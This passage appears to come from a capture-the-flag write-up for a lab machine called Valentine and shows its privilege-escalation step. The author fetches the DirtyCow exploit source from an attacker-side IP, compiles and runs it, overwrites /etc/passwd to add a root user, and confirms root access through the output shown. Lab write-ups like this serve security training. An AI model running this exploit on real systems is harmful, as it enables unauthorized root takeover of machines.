6 privesc dirtyc0w
Using https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c
hype@Valentine:/tmp$ wget 10.10.14.14/dirty.c
hype@Valentine:/tmp$ gcc -pthread dirty.c -o dirty -lcrypt
hype@Valentine:/tmp$ ./dirty kashz
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: kashz
Complete line:
firefart:fi6dxP9V43i5U:0:0:pwned:/root:/bin/bash
mmap: 7f302f29f000
madvise 0
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'kashz'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'kashz'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
hype@Valentine:/tmp$ su firefart
Password:
firefart@Valentine:/tmp# whoami;id
firefart
uid=0(firefart) gid=0(root) groups=0(root)
Last updated